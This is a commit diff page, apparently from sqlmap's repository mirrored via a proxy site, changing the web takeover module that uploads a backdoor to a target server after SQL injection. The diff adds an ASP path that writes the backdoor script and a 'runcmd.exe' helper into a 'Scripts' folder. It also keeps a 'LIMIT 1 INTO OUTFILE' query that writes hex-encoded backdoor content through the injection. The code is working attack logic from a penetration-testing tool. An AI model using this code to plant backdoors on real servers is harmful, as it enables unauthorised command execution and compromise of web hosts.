Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 858cb25

Browse files
stamparmstamparm
committed
update
1 parent 0795e11 commit 858cb25

1 file changed

Lines changed: 23 additions & 7 deletions

File tree

lib/takeover/web.py

Lines changed: 23 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -23,6 +23,7 @@
2323
"""
2424

2525
import os
26+
import posixpath
2627
import re
2728

2829
from extra.cloak.cloak import decloak
@@ -86,8 +87,7 @@ def webFileUpload(self, fileToUpload, destFileName, directory):
8687
return retVal
8788

8889
def __webFileStreamUpload(self, stream, destFileName, directory):
89-
stream.seek(0) #rewind
90-
90+
stream.seek(0) #rewind
9191
if self.webApi in ("php", "asp"):
9292
multipartParams = {
9393
"upload": "1",
@@ -109,7 +109,7 @@ def __webFileStreamUpload(self, stream, destFileName, directory):
109109
return False
110110

111111
def __webFileInject(self, fileContent, fileName, directory):
112-
outFile = normalizePath("%s/%s" % (directory, fileName))
112+
outFile = posixpath.normpath("%s/%s" % (directory, fileName))
113113
uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
114114
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
115115
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
@@ -197,7 +197,23 @@ def webInit(self):
197197
infoMsg += "on '%s'" % directory
198198
logger.info(infoMsg)
199199

200-
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
200+
if self.webApi == "asp":
201+
runcmdName = 'runcmd.exe'
202+
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, runcmdName + '_'), runcmdName)
203+
scriptsDirectory = "Scripts"
204+
backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
205+
backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory)
206+
backdoorStream.file.truncate()
207+
backdoorStream.read()
208+
backdoorStream.seek(0)
209+
backdoorStream.write(backdoorContent)
210+
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
211+
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
212+
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
213+
self.webDirectory = directory
214+
else:
215+
continue
216+
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
201217
warnMsg = "backdoor hasn't been successfully uploaded "
202218
warnMsg += "with uploader probably because of permission "
203219
warnMsg += "issues."
@@ -209,9 +225,9 @@ def webInit(self):
209225
self.__webFileInject(backdoorContent, backdoorName, directory)
210226
else:
211227
continue
212-
213-
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
214-
self.webDirectory = directory
228+
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
229+
self.webDirectory = directory
230+
215231
infoMsg = "the backdoor has probably been successfully "
216232
infoMsg += "uploaded on '%s', go with your browser " % directory
217233
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl

0 commit comments

Comments
 (0)